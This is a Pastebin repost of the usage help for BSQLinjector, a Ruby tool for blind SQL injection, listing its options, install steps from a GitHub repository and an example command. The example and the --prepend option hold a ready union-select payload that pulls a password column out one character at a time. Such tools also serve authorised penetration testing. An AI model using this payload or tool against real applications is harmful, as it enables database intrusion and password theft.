API tools faq
paste
Advertisement
TVT618

BSDLinjecttor - Blind SQL Injection Exploit tool

TVT618
Jul 26th, 2018
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
raw download clone embed print report
  1. BSQLinjector:
  2. BSQLinjector uses blind method to retrieve data from SQL databases. I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application.
  3.  
  4. Options:
  5. --file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
  6. --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
  7. --prepend Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  8. --append How to end our payload. For example comment out rest of SQL statement. (--append='#)
  9. --schar Character placed around chars. This character is not used while in hex mode. (--schar="'")
  10. --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
  11.  
  12. --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
  13. --postgres Use postgres "for" in substring function (e.g. from 1 for 1).
  14. --hex Use hex to compare instead of characters.
  15. --case Case sensitivity.
  16.  
  17. --ssl Use SSL.
  18. --proxy Proxy to use. (--proxy=127.0.0.1:8080)
  19.  
  20. --test Enable test mode. Do not send request, just show full payload.
  21. --special Include all special characters in enumeration.
  22. --start Start enumeration from specified character. (--start=10)
  23. --max Maximum characters to enumerate. (--max=10)
  24. --timeout Timeout in waiting for responses. (--timeout=20)
  25. --only-final Stop showing each enumerated letter.
  26. --comma Encode comma.
  27. --bracket Add brackets to the end of substring function. --bracket="))"
  28. --hexspace Use space instead of brackets to split hex values.
  29. --verbose Show verbose messages.
  30.  
  31. Install on Linux:
  32. git clone https://github.com/enjoiz/BSQLinjector/
  33. cd BSQLinjector
  34. ruby BSQLinjector.rb -h
  35.  
  36. Install on Windows:
  37. Install Ruby from Ruby-lang.org
  38. Install Git from Git-scm.com
  39.  
  40. Open Command Prompt and enter the following commands:
  41. git clone https://github.com/enjoiz/BSQLinjector/
  42. cd BSQLinjector
  43. ruby BSQLinjector.rb -h
  44.  
  45. Example usage:
  46. ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
  47.  
  48. Download BSDLinjector: https://github.com/enjoiz/BSQLinjector/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!